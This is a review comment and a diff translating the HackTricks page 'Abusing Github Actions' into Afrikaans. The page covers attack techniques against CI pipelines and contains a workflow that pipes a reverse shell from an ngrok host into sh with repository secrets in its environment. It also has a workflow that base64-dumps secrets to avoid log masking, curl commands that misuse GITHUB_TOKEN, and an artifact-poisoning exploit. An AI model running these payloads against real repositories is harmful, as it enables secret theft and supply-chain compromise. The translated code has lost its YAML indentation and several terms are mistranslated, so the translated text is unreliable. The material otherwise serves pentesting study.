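Review bot: The translated YAML in src/pentesting-ci-cd/github-security/README.md lost its indentation, so the snippets no longer parse as the `-` lines did: in the push-trigger example `+branches:` and `+- current_branch_name #Use '**' to run when a push is made to any branch` now sit at column 0 instead of nested under `push:`, and in the imposter-commit workflow `+commit:` together with its `runs-on` and `steps` lines is flattened to the top level, which turns `commit` into a stray top-level key instead of a job under `jobs:`. Restore the original leading spaces; a translation should change prose only, never code. The same loss of indentation hits the nested markdown bullets (the `_Let wel ..._` note and the CODEOWNERS remark under the approval and Code Owners items, the "skryftoegang ... nuwe tak skep" item under "Omseiling van drukbeskermings", and "**Verwydering** van werkvloei **resultate**" under "Steel **github tokens**"), which now render as unrelated top-level bullets. Several wordings also change meaning and should be fixed before merge: "Gemonteerde GitHub Apps" says "mounted" rather than installed ("GeĂŻnstalleerde"); "skoppe" for OAuth scopes means "kicks" (keep "scopes" or use "omvange"); "buitelandse samewerkers" means foreign collaborators where the original means outside collaborators ("eksterne samewerkers"); "takverlangings" drops "pull request requirements"; "kwulnerbare" and "opdraginjekie" should be "kwesbare" and "opdraginjeksie"; "geconfigureer" should be "gekonfigureer"; and "'n omgewing **van al die takke toegang kan verkry**" inverts the original, which says the environment can be accessed from all the branches. Translating git commits as "verbintenisse" (commitments) in the GPG and branch-protection paragraphs is also confusing, since the term is kept as "commit" later in the same file.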
@@ -1,384 +1,366 @@ -# Abusing Github Actions +# Misbruik van Github Actions {{#include ../../../banners/hacktricks-training.md}} -## Basic Information +## Basiese Inligting -In this page you will find: +In hierdie bladsy sal jy vind: -- A **summary of all the impacts** of an attacker managing to access a Github Action -- Different ways to **get access to an action**: - - Having **permissions** to create the action - - Abusing **pull request** related triggers - - Abusing **other external access** techniques - - **Pivoting** from an already compromised repo -- Finally, a section about **post-exploitation techniques to abuse an action from inside** (cause the mentioned impacts) +- 'n **opsomming van al die impakte** van 'n aanvaller wat daarin slaag om toegang tot 'n Github Action te verkry +- Verskillende maniere om **toegang tot 'n aksie** te verkry: +- Om **toestemmings** te hĂȘ om die aksie te skep +- Misbruik van **pull request** verwante triggers +- Misbruik van **ander eksterne toegang** tegnieke +- **Pivoting** vanaf 'n reeds gecompromitteerde repo +- Laastens, 'n afdeling oor **post-exploitatie tegnieke om 'n aksie van binne te misbruik** (om die genoem impakte te veroorsaak) -## Impacts Summary +## Impakte Opsomming -For an introduction about [**Github Actions check the basic information**](../basic-github-information.md#github-actions). +Vir 'n inleiding oor [**Github Actions kyk na die basiese inligting**](../basic-github-information.md#github-actions). -If you can **execute arbitrary code in GitHub Actions** within a **repository**, you may be able to: +As jy **arbitraire kode in GitHub Actions** binne 'n **repository** kan **uitvoer**, mag jy in staat wees om: -- **Steal secrets** mounted to the pipeline and **abuse the pipeline's privileges** to gain unauthorized access to external platforms, such as AWS and GCP. -- **Compromise deployments** and other **artifacts**. 
- - If the pipeline deploys or stores assets, you could alter the final product, enabling a supply chain attack. -- **Execute code in custom workers** to abuse computing power and pivot to other systems. -- **Overwrite repository code**, depending on the permissions associated with the `GITHUB_TOKEN`. +- **Geheime** wat aan die pyplyn gekoppel is te **steel** en die **privileges van die pyplyn** te misbruik om ongeoorloofde toegang tot eksterne platforms, soos AWS en GCP, te verkry. +- **Ontplooiings** en ander **artefakte** te **kompromitteer**. +- As die pyplyn bates ontplooi of stoor, kan jy die finale produk verander, wat 'n voorsieningskettingaanval moontlik maak. +- **Kode in pasgemaakte werkers** uit te voer om rekenaarkrag te misbruik en na ander stelsels te pivot. +- **Repository kode te oorskryf**, afhangende van die toestemmings wat met die `GITHUB_TOKEN` geassosieer is. ## GITHUB_TOKEN -This "**secret**" (coming from `${{ secrets.GITHUB_TOKEN }}` and `${{ github.token }}`) is given when the admin enables this option: +Hierdie "**geheim**" (kom van `${{ secrets.GITHUB_TOKEN }}` en `${{ github.token }}`) word gegee wanneer die admin hierdie opsie aktiveer:
-This token is the same one a **Github Application will use**, so it can access the same endpoints: [https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps) +Hierdie token is dieselfde een wat 'n **Github Toepassing sal gebruik**, sodat dit toegang tot dieselfde eindpunte kan hĂȘ: [https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps) > [!WARNING] -> Github should release a [**flow**](https://github.com/github/roadmap/issues/74) that **allows cross-repository** access within GitHub, so a repo can access other internal repos using the `GITHUB_TOKEN`. +> Github moet 'n [**vloei**](https://github.com/github/roadmap/issues/74) vrystel wat **kruis-repository** toegang binne GitHub toelaat, sodat 'n repo ander interne repos met die `GITHUB_TOKEN` kan benader. -You can see the possible **permissions** of this token in: [https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token) +Jy kan die moontlike **toestemmings** van hierdie token sien in: [https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token) -Note that the token **expires after the job has completed**.\ -These tokens looks like this: `ghs_veaxARUji7EXszBMbhkr4Nz2dYz0sqkeiur7` +Let daarop dat die token **verval nadat die werk voltooi is**.\ +Hierdie tokens lyk soos volg: `ghs_veaxARUji7EXszBMbhkr4Nz2dYz0sqkeiur7` -Some interesting things you can do with this token: +Sommige interessante dinge wat jy met hierdie token kan doen: {{#tabs }} {{#tab name="Merge PR" }} - ```bash # 
Merge PR curl -X PUT \ - https://api.github.com/repos///pulls//merge \ - -H "Accept: application/vnd.github.v3+json" \ - --header "authorization: Bearer $GITHUB_TOKEN" \ - --header "content-type: application/json" \ - -d "{\"commit_title\":\"commit_title\"}" +https://api.github.com/repos///pulls//merge \ +-H "Accept: application/vnd.github.v3+json" \ +--header "authorization: Bearer $GITHUB_TOKEN" \ +--header "content-type: application/json" \ +-d "{\"commit_title\":\"commit_title\"}" ``` - {{#endtab }} -{{#tab name="Approve PR" }} - +{{#tab name="Goedkeur PR" }} ```bash # Approve a PR curl -X POST \ - https://api.github.com/repos///pulls//reviews \ - -H "Accept: application/vnd.github.v3+json" \ - --header "authorization: Bearer $GITHUB_TOKEN" \ - --header 'content-type: application/json' \ - -d '{"event":"APPROVE"}' +https://api.github.com/repos///pulls//reviews \ +-H "Accept: application/vnd.github.v3+json" \ +--header "authorization: Bearer $GITHUB_TOKEN" \ +--header 'content-type: application/json' \ +-d '{"event":"APPROVE"}' ``` - {{#endtab }} -{{#tab name="Create PR" }} - +{{#tab name="Skep PR" }} ```bash # Create a PR curl -X POST \ - -H "Accept: application/vnd.github.v3+json" \ - --header "authorization: Bearer $GITHUB_TOKEN" \ - --header 'content-type: application/json' \ - https://api.github.com/repos///pulls \ - -d '{"head":"","base":"master", "title":"title"}' +-H "Accept: application/vnd.github.v3+json" \ +--header "authorization: Bearer $GITHUB_TOKEN" \ +--header 'content-type: application/json' \ +https://api.github.com/repos///pulls \ +-d '{"head":"","base":"master", "title":"title"}' ``` - {{#endtab }} {{#endtabs }} > [!CAUTION] -> Note that in several occasions you will be able to find **github user tokens inside Github Actions envs or in the secrets**. These tokens may give you more privileges over the repository and organization. 
+> Let daarop dat jy in verskeie gevalle **github gebruikers tokens binne Github Actions omgewings of in die geheime** sal vind. Hierdie tokens kan jou meer voorregte oor die repository en organisasie gee.
-List secrets in Github Action output - +lys geheime in Github Action uitvoer ```yaml name: list_env on: - workflow_dispatch: # Launch manually - pull_request: #Run it when a PR is created to a branch - branches: - - "**" - push: # Run it when a push is made to a branch - branches: - - "**" +workflow_dispatch: # Launch manually +pull_request: #Run it when a PR is created to a branch +branches: +- "**" +push: # Run it when a push is made to a branch +branches: +- "**" jobs: - List_env: - runs-on: ubuntu-latest - steps: - - name: List Env - # Need to base64 encode or github will change the secret value for "***" - run: sh -c 'env | grep "secret_" | base64 -w0' - env: - secret_myql_pass: ${{secrets.MYSQL_PASSWORD}} - secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}} +List_env: +runs-on: ubuntu-latest +steps: +- name: List Env +# Need to base64 encode or github will change the secret value for "***" +run: sh -c 'env | grep "secret_" | base64 -w0' +env: +secret_myql_pass: ${{secrets.MYSQL_PASSWORD}} +secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}} ``` -
-Get reverse shell with secrets - +Kry omgekeerde skulp met geheime ```yaml name: revshell on: - workflow_dispatch: # Launch manually - pull_request: #Run it when a PR is created to a branch - branches: - - "**" - push: # Run it when a push is made to a branch - branches: - - "**" +workflow_dispatch: # Launch manually +pull_request: #Run it when a PR is created to a branch +branches: +- "**" +push: # Run it when a push is made to a branch +branches: +- "**" jobs: - create_pull_request: - runs-on: ubuntu-latest - steps: - - name: Get Rev Shell - run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh' - env: - secret_myql_pass: ${{secrets.MYSQL_PASSWORD}} - secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}} +create_pull_request: +runs-on: ubuntu-latest +steps: +- name: Get Rev Shell +run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh' +env: +secret_myql_pass: ${{secrets.MYSQL_PASSWORD}} +secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}} ``` -
-It's possible to check the permissions given to a Github Token in other users repositories **checking the logs** of the actions: +Dit is moontlik om die toestemmings wat aan 'n Github Token gegee is in ander gebruikers se repositories **te kontroleer deur die logs** van die aksies:
-## Allowed Execution +## Toegelate Uitvoering > [!NOTE] -> This would be the easiest way to compromise Github actions, as this case suppose that you have access to **create a new repo in the organization**, or have **write privileges over a repository**. +> Dit sou die maklikste manier wees om Github aksies te kompromitteer, aangesien hierdie geval veronderstel dat jy toegang het om **'n nuwe repo in die organisasie te skep**, of **skryfregte oor 'n repository** het. > -> If you are in this scenario you can just check the [Post Exploitation techniques](./#post-exploitation-techniques-from-inside-an-action). +> As jy in hierdie scenario is, kan jy net die [Post Exploitation techniques](./#post-exploitation-techniques-from-inside-an-action) nagaan. -### Execution from Repo Creation +### Uitvoering vanaf Repo Skepping -In case members of an organization can **create new repos** and you can execute github actions, you can **create a new repo and steal the secrets set at organization level**. +In die geval dat lede van 'n organisasie **nuwe repos kan skep** en jy kan github aksies uitvoer, kan jy **'n nuwe repo skep en die geheime wat op organisasievlak gestel is, steel**. -### Execution from a New Branch +### Uitvoering vanaf 'n Nuwe Tak -If you can **create a new branch in a repository that already contains a Github Action** configured, you can **modify** it, **upload** the content, and then **execute that action from the new branch**. This way you can **exfiltrate repository and organization level secrets** (but you need to know how they are called). - -You can make the modified action executable **manually,** when a **PR is created** or when **some code is pushed** (depending on how noisy you want to be): +As jy **'n nuwe tak in 'n repository kan skep wat reeds 'n Github Action** geconfigureer het, kan jy dit **wysig**, **die inhoud oplaai**, en dan **daardie aksie vanaf die nuwe tak uitvoer**. 
Op hierdie manier kan jy **repository en organisasievlak geheime** **uitvoer** (maar jy moet weet hoe hulle genoem word). +Jy kan die gewysigde aksie uitvoerbaar maak **handmatig,** wanneer 'n **PR geskep word** of wanneer **enige kode gepush word** (afhangende van hoe luidrugtig jy wil wees): ```yaml on: - workflow_dispatch: # Launch manually - pull_request: #Run it when a PR is created to a branch - branches: - - master - push: # Run it when a push is made to a branch - branches: - - current_branch_name +workflow_dispatch: # Launch manually +pull_request: #Run it when a PR is created to a branch +branches: +- master +push: # Run it when a push is made to a branch +branches: +- current_branch_name # Use '**' instead of a branh name to trigger the action in all the cranches ``` - --- -## Forked Execution +## Forked Uitvoering > [!NOTE] -> There are different triggers that could allow an attacker to **execute a Github Action of another repository**. If those triggerable actions are poorly configured, an attacker could be able to compromise them. +> Daar is verskillende triggers wat 'n aanvaller kan toelaat om **'n Github Action van 'n ander repository uit te voer**. As daardie triggerbare aksies swak geconfigureer is, kan 'n aanvaller in staat wees om hulle te kompromitteer. ### `pull_request` -The workflow trigger **`pull_request`** will execute the workflow every time a pull request is received with some exceptions: by default if it's the **first time** you are **collaborating**, some **maintainer** will need to **approve** the **run** of the workflow: +Die werksvloei-trigger **`pull_request`** sal die werksvloei elke keer uitvoer wanneer 'n pull request ontvang word met 'n paar uitsonderings: standaard, as dit die **eerste keer** is dat jy **saamwerk**, sal 'n **onderhouer** die **uitvoering** van die werksvloei moet **goedkeur**:
> [!NOTE] -> As the **default limitation** is for **first-time** contributors, you could contribute **fixing a valid bug/typo** and then send **other PRs to abuse your new `pull_request` privileges**. +> Aangesien die **standaard beperking** vir **eerste keer** bydraers is, kan jy **bydra tot die regstelling van 'n geldige fout/typo** en dan **ander PRs stuur om jou nuwe `pull_request` voorregte te misbruik**. > -> **I tested this and it doesn't work**: ~~Another option would be to create an account with the name of someone that contributed to the project and deleted his account.~~ +> **Ek het dit getoets en dit werk nie**: ~~‘n Ander opsie sou wees om 'n rekening te skep met die naam van iemand wat by die projek bygedra het en sy rekening te verwyder.~~ -Moreover, by default **prevents write permissions** and **secrets access** to the target repository as mentioned in the [**docs**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflows-in-forked-repositories): +Boonop **verhoed dit standaard skryfrechten** en **toegang tot geheime** tot die teikengebruikersrepo soos genoem in die [**dokumentasie**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflows-in-forked-repositories): -> With the exception of `GITHUB_TOKEN`, **secrets are not passed to the runner** when a workflow is triggered from a **forked** repository. The **`GITHUB_TOKEN` has read-only permissions** in pull requests **from forked repositories**. +> Met die uitsondering van `GITHUB_TOKEN`, **word geheime nie aan die hardloper oorgedra** wanneer 'n werksvloei van 'n **forked** repository geaktiveer word nie. Die **`GITHUB_TOKEN` het slegs leesregte** in pull requests **van forked repositories**. -An attacker could modify the definition of the Github Action in order to execute arbitrary things and append arbitrary actions. However, he won't be able to steal secrets or overwrite the repo because of the mentioned limitations. 
+'n Aanvaller kan die definisie van die Github Action wysig om arbitrĂȘre dinge uit te voer en arbitrĂȘre aksies by te voeg. Hy sal egter nie in staat wees om geheime te steel of die repo te oorskryf nie weens die genoem beperkings. > [!CAUTION] -> **Yes, if the attacker change in the PR the github action that will be triggered, his Github Action will be the one used and not the one from the origin repo!** +> **Ja, as die aanvaller die github action in die PR verander wat geaktiveer sal word, sal sy Github Action die een wees wat gebruik word en nie die een van die oorspronklike repo nie!** -As the attacker also controls the code being executed, even if there aren't secrets or write permissions on the `GITHUB_TOKEN` an attacker could for example **upload malicious artifacts**. +Aangesien die aanvaller ook die kode wat uitgevoer word, beheer, selfs al is daar geen geheime of skryfrechten op die `GITHUB_TOKEN` nie, kan 'n aanvaller byvoorbeeld **kwaadaardige artefakte oplaai**. ### **`pull_request_target`** -The workflow trigger **`pull_request_target`** have **write permission** to the target repository and **access to secrets** (and doesn't ask for permission). +Die werksvloei-trigger **`pull_request_target`** het **skryfrechten** tot die teikengebruikersrepo en **toegang tot geheime** (en vra nie vir toestemming nie). -Note that the workflow trigger **`pull_request_target`** **runs in the base context** and not in the one given by the PR (to **not execute untrusted code**). For more info about `pull_request_target` [**check the docs**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#pull_request_target).\ -Moreover, for more info about this specific dangerous use check this [**github blog post**](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/). 
+Let daarop dat die werksvloei-trigger **`pull_request_target`** **in die basis konteks** loop en nie in die een gegee deur die PR nie (om **nie onbetroubare kode uit te voer**). Vir meer inligting oor `pull_request_target` [**kyk die dokumentasie**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#pull_request_target).\ +Boonop, vir meer inligting oor hierdie spesifieke gevaarlike gebruik, kyk hierdie [**github blog pos**](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/). -It might look like because the **executed workflow** is the one defined in the **base** and **not in the PR** it's **secure** to use **`pull_request_target`**, but there are a **few cases were it isn't**. +Dit mag lyk asof die **uitgevoerde werksvloei** die een is wat in die **basis** gedefinieer is en **nie in die PR nie**, dit is **veilig** om **`pull_request_target`** te gebruik, maar daar is 'n **paar gevalle waar dit nie is nie**. -An this one will have **access to secrets**. +En hierdie een sal **toegang tot geheime** hĂȘ. ### `workflow_run` -The [**workflow_run**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflow_run) trigger allows to run a workflow from a different one when it's `completed`, `requested` or `in_progress`. - -In this example, a workflow is configured to run after the separate "Run Tests" workflow completes: +Die [**workflow_run**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflow_run) trigger laat toe om 'n werksvloei van 'n ander een uit te voer wanneer dit `voltooi`, `gevraag` of `in_progress` is. 
+In hierdie voorbeeld is 'n werksvloei geconfigureer om uit te voer nadat die aparte "Toets Hardloop" werksvloei voltooi is: ```yaml on: - workflow_run: - workflows: [Run Tests] - types: - - completed +workflow_run: +workflows: [Run Tests] +types: +- completed ``` +Moreover, according to the docs: Die werksvloei wat deur die `workflow_run` gebeurtenis begin is, kan **toegang tot geheime hĂȘ en tokens skryf, selfs al was die vorige werksvloei nie**. -Moreover, according to the docs: The workflow started by the `workflow_run` event is able to **access secrets and write tokens, even if the previous workflow was not**. - -This kind of workflow could be attacked if it's **depending** on a **workflow** that can be **triggered** by an external user via **`pull_request`** or **`pull_request_target`**. A couple of vulnerable examples can be [**found this blog**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability)**.** The first one consist on the **`workflow_run`** triggered workflow downloading out the attackers code: `${{ github.event.pull_request.head.sha }}`\ -The second one consist on **passing** an **artifact** from the **untrusted** code to the **`workflow_run`** workflow and using the content of this artifact in a way that makes it **vulnerable to RCE**. +Hierdie tipe werksvloei kan aangeval word as dit **afhang** van 'n **werksvloei** wat deur 'n eksterne gebruiker via **`pull_request`** of **`pull_request_target`** geaktiveer kan word. 
'n Paar kwesbare voorbeelde kan [**hierdie blog**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability)** gevind word.** Die eerste een bestaan uit die **`workflow_run`** geaktiveerde werksvloei wat die aanvallerskode aflaai: `${{ github.event.pull_request.head.sha }}`\ +Die tweede een bestaan uit **die oordrag** van 'n **artefak** van die **onbetroubare** kode na die **`workflow_run`** werksvloei en die gebruik van die inhoud van hierdie artefak op 'n manier wat dit **kwesbaar maak vir RCE**. ### `workflow_call` TODO -TODO: Check if when executed from a pull_request the used/downloaded code if the one from the origin or from the forked PR +TODO: Kontroleer of wanneer dit vanaf 'n pull_request uitgevoer word, die gebruikte/afgelaaide kode die een van die oorsprong of van die geforkte PR is. -## Abusing Forked Execution +## Misbruik van Geforkte Uitvoering -We have mentioned all the ways an external attacker could manage to make a github workflow to execute, now let's take a look about how this executions, if bad configured, could be abused: +Ons het al die maniere genoem hoe 'n eksterne aanvaller 'n github werksvloei kan laat uitvoer, kom ons kyk nou na hoe hierdie uitvoerings, as dit sleg geconfigureer is, misbruik kan word: -### Untrusted checkout execution +### Onbetroubare checkout uitvoering -In the case of **`pull_request`,** the workflow is going to be executed in the **context of the PR** (so it'll execute the **malicious PRs code**), but someone needs to **authorize it first** and it will run with some [limitations](./#pull_request). +In die geval van **`pull_request`,** sal die werksvloei in die **konsep van die PR** uitgevoer word (so dit sal die **kwesbare PR se kode** uitvoer), maar iemand moet dit **eers goedkeur** en dit sal met 'n paar [beperkings](./#pull_request) loop. 
-In case of a workflow using **`pull_request_target` or `workflow_run`** that depends on a workflow that can be triggered from **`pull_request_target` or `pull_request`** the code from the original repo will be executed, so the **attacker cannot control the executed code**. +In die geval van 'n werksvloei wat **`pull_request_target` of `workflow_run`** gebruik wat afhang van 'n werksvloei wat vanaf **`pull_request_target` of `pull_request`** geaktiveer kan word, sal die kode van die oorspronklike repo uitgevoer word, so die **aanvaller kan nie die uitgevoerde kode beheer nie**. > [!CAUTION] -> However, if the **action** has an **explicit PR checkou**t that will **get the code from the PR** (and not from base), it will use the attackers controlled code. For example (check line 12 where the PR code is downloaded): +> egter, as die **aksie** 'n **duidelike PR checkout** het wat **die kode van die PR** sal **kry** (en nie van die basis nie), sal dit die aanvallers beheerde kode gebruik. Byvoorbeeld (kyk na lyn 12 waar die PR kode afgelaai word): -
# INSECURE. Provided as an example only.
+
# ONVEILIG. Slegs as 'n voorbeeld verskaf.
 on:
-  pull_request_target
+pull_request_target
 
 jobs:
-  build:
-    name: Build and test
-    runs-on: ubuntu-latest
-    steps:
+build:
+name: Bou en toets
+runs-on: ubuntu-latest
+steps:
     - uses: actions/checkout@v2
       with:
         ref: ${{ github.event.pull_request.head.sha }}
 
-    - uses: actions/setup-node@v1
-    - run: |
-        npm install
-        npm build
+- uses: actions/setup-node@v1
+- run: |
+npm install
+npm build
 
-    - uses: completely/fakeaction@v2
-      with:
-        arg1: ${{ secrets.supersecret }}
+- uses: completely/fakeaction@v2
+with:
+arg1: ${{ secrets.supersecret }}
 
-    - uses: fakerepo/comment-on-pr@v1
-      with:
-        message: |
-          Thank you!
+- uses: fakerepo/comment-on-pr@v1
+with:
+message: |
+Dankie!
 
-The potentially **untrusted code is being run during `npm install` or `npm build`** as the build scripts and referenced **packages are controlled by the author of the PR**. +Die potensieel **onbetroubare kode word tydens `npm install` of `npm build`** uitgevoer aangesien die bou skripte en verwysde **pakkette deur die outeur van die PR** beheer word. > [!WARNING] -> A github dork to search for vulnerable actions is: `event.pull_request pull_request_target extension:yml` however, there are different ways to configure the jobs to be executed securely even if the action is configured insecurely (like using conditionals about who is the actor generating the PR). +> 'n github dork om vir kwesbare aksies te soek is: `event.pull_request pull_request_target extension:yml` egter, daar is verskillende maniere om die werksgeleenthede te konfigureer om veilig uitgevoer te word selfs al is die aksie onveilig geconfigureer (soos om voorwaardes te gebruik oor wie die akteur is wat die PR genereer). -### Context Script Injections +### Konteks Skrip Injekties -Note that there are certain [**github contexts**](https://docs.github.com/en/actions/reference/context-and-expression-syntax-for-github-actions#github-context) whose values are **controlled** by the **user** creating the PR. If the github action is using that **data to execute anything**, it could lead to **arbitrary code execution:** +Let daarop dat daar sekere [**github kontekste**](https://docs.github.com/en/actions/reference/context-and-expression-syntax-for-github-actions#github-context) is waarvan die waardes **beheer** word deur die **gebruiker** wat die PR skep. 
As die github aksie daardie **data gebruik om enigiets uit te voer**, kan dit lei tot **arbitraire kode uitvoering:** {{#ref}} gh-actions-context-script-injections.md {{#endref}} -### **GITHUB_ENV Script Injection** +### **GITHUB_ENV Skrip Injekie** -From the docs: You can make an **environment variable available to any subsequent steps** in a workflow job by defining or updating the environment variable and writing this to the **`GITHUB_ENV`** environment file. +Volgens die dokumentasie: Jy kan 'n **omgewing veranderlike beskikbaar maak vir enige daaropvolgende stappe** in 'n werksvloei taak deur die omgewing veranderlike te definieer of op te dateer en dit na die **`GITHUB_ENV`** omgewing lĂȘer te skryf. -If an attacker could **inject any value** inside this **env** variable, he could inject env variables that could execute code in following steps such as **LD_PRELOAD** or **NODE_OPTIONS**. +As 'n aanvaller **enige waarde** binne hierdie **env** veranderlike kan **injekteer**, kan hy env veranderlikes injekteer wat kode in daaropvolgende stappe kan uitvoer soos **LD_PRELOAD** of **NODE_OPTIONS**. -For example ([**this**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability-0) and [**this**](https://www.legitsecurity.com/blog/-how-we-found-another-github-action-environment-injection-vulnerability-in-a-google-project)), imagine a workflow that is trusting an uploaded artifact to store its content inside **`GITHUB_ENV`** env variable. An attacker could upload something like this to compromise it: +Byvoorbeeld ([**hierdie**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability-0) en [**hierdie**](https://www.legitsecurity.com/blog/-how-we-found-another-github-action-environment-injection-vulnerability-in-a-google-project)), stel jou voor 'n werksvloei wat 'n geupload artefak vertrou om sy inhoud binne die **`GITHUB_ENV`** env veranderlike te stoor. 'n Aanvaller kan iets soos dit oplaai om dit te kompromitteer:
-### Vulnerable Third Party Github Actions +### Kwesbare Derdeparty Github Aksies #### [dawidd6/action-download-artifact](https://github.com/dawidd6/action-download-artifact) -As mentioned in [**this blog post**](https://www.legitsecurity.com/blog/github-actions-that-open-the-door-to-cicd-pipeline-attacks), this Github Action allows to access artifacts from different workflows and even repositories. +Soos genoem in [**hierdie blogpos**](https://www.legitsecurity.com/blog/github-actions-that-open-the-door-to-cicd-pipeline-attacks), laat hierdie Github Aksie toe om toegang tot artefakte van verskillende werksvloei en selfs repositories te verkry. -The thing problem is that if the **`path`** parameter isn't set, the artifact is extracted in the current directory and it can override files that could be later used or even executed in the workflow. Therefore, if the Artifact is vulnerable, an attacker could abuse this to compromise other workflows trusting the Artifact. - -Example of vulnerable workflow: +Die probleem is dat as die **`path`** parameter nie gestel is nie, die artefak in die huidige gids uitgepak word en dit kan lĂȘers oorskryf wat later in die werksvloei gebruik of selfs uitgevoer kan word. Daarom, as die Artefak kwesbaar is, kan 'n aanvaller dit misbruik om ander werksvloei wat die Artefak vertrou, te kompromitteer. 
+Voorbeeld van kwesbare werksvloei: ```yaml on: - workflow_run: - workflows: ["some workflow"] - types: - - completed +workflow_run: +workflows: ["some workflow"] +types: +- completed jobs: - success: - runs-on: ubuntu-latest - steps: - - uses: actions/checkout@v2 - - name: download artifact - uses: dawidd6/action-download-artifact - with: - workflow: ${{ github.event.workflow_run.workflow_id }} - name: artifact - - run: python ./script.py - with: - name: artifact - path: ./script.py +success: +runs-on: ubuntu-latest +steps: +- uses: actions/checkout@v2 +- name: download artifact +uses: dawidd6/action-download-artifact +with: +workflow: ${{ github.event.workflow_run.workflow_id }} +name: artifact +- run: python ./script.py +with: +name: artifact +path: ./script.py ``` - -This could be attacked with this workflow: - +Dit kan aangeval word met hierdie werksvloei: ```yaml name: "some workflow" on: pull_request jobs: - upload: - runs-on: ubuntu-latest - steps: - - run: echo "print('exploited')" > ./script.py - - uses actions/upload-artifact@v2 - with: - name: artifact - path: ./script.py +upload: +runs-on: ubuntu-latest +steps: +- run: echo "print('exploited')" > ./script.py +- uses actions/upload-artifact@v2 +with: +name: artifact +path: ./script.py ``` - --- -## Other External Access +## Ander Eksterne Toegang -### Deleted Namespace Repo Hijacking +### Verwyderde Namespace Repo Hijacking -If an account changes it's name another user could register an account with that name after some time. If a repository had **less than 100 stars previously to the change of nam**e, Github will allow the new register user with the same name to create a **repository with the same name** as the one deleted. +As 'n rekening sy naam verander, kan 'n ander gebruiker 'n rekening met daardie naam registreer na 'n tyd. 
As 'n repository **minder as 100 sterre gehad het voor die naamsverandering**, sal Github die nuwe geregistreerde gebruiker met dieselfde naam toelaat om 'n **repository met dieselfde naam** as die een wat verwyder is, te skep. > [!CAUTION] -> So if an action is using a repo from a non-existent account, it's still possible that an attacker could create that account and compromise the action. +> So as 'n aksie 'n repo van 'n nie-bestaande rekening gebruik, is dit steeds moontlik dat 'n aanvaller daardie rekening kan skep en die aksie kan kompromitteer. -If other repositories where using **dependencies from this user repos**, an attacker will be able to hijack them Here you have a more complete explanation: [https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/](https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/) +As ander repositories **afhangklikhede van hierdie gebruiker repos** gebruik, sal 'n aanvaller in staat wees om hulle te hijack. Hier is 'n meer volledige verduideliking: [https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/](https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/) --- ## Repo Pivoting > [!NOTE] -> In this section we will talk about techniques that would allow to **pivot from one repo to another** supposing we have some kind of access on the first one (check the previous section). +> In hierdie afdeling sal ons praat oor tegnieke wat sou toelaat om te **pivot van een repo na 'n ander** mits ons 'n soort toegang op die eerste een het (kyk na die vorige afdeling). ### Cache Poisoning -A cache is maintained between **wokflow runs in the same branch**. Which means that if an attacker **compromise** a **package** that is then stored in the cache and **downloaded** and executed by a **more privileged** workflow he will be able to **compromise** also that workflow. 
+'n Cache word tussen **workflow-uitvoerings in dieselfde tak** gehandhaaf. Dit beteken dat as 'n aanvaller **kompromitteer** 'n **pakket** wat dan in die cache gestoor word en **afgelaai** en uitgevoer word deur 'n **meer bevoorregte** workflow, hy ook daardie workflow sal kan **kompromitteer**. {{#ref}} gh-actions-cache-poisoning.md @@ -386,7 +368,7 @@ gh-actions-cache-poisoning.md ### Artifact Poisoning -Workflows could use **artifacts from other workflows and even repos**, if an attacker manages to **compromise** the Github Action that **uploads an artifact** that is later used by another workflow he could **compromise the other workflows**: +Workflows kan **artifacts van ander workflows en selfs repos** gebruik, as 'n aanvaller daarin slaag om die Github Action wat 'n **artifact** oplaai wat later deur 'n ander workflow gebruik word, te **kompromitteer**, kan hy die **ander workflows** ook **kompromitteer**: {{#ref}} gh-actions-artifact-poisoning.md @@ -394,11 +376,11 @@ gh-actions-artifact-poisoning.md --- -## Post Exploitation from an Action +## Post Exploitation van 'n Aksie -### Accessing AWS and GCP via OIDC +### Toegang tot AWS en GCP via OIDC -Check the following pages: +Kyk na die volgende bladsye: {{#ref}} ../../../pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md @@ -408,170 +390,160 @@ Check the following pages: ../../../pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md {{#endref}} -### Accessing secrets +### Toegang tot geheime -If you are injecting content into a script it's interesting to know how you can access secrets: +As jy inhoud in 'n skrif inspuit, is dit interessant om te weet hoe jy toegang tot geheime kan kry: -- If the secret or token is set to an **environment variable**, it can be directly accessed through the environment using **`printenv`**. +- As die geheim of token op 'n **omgewing veranderlike** gestel is, kan dit direk deur die omgewing met **`printenv`** aangespreek word.
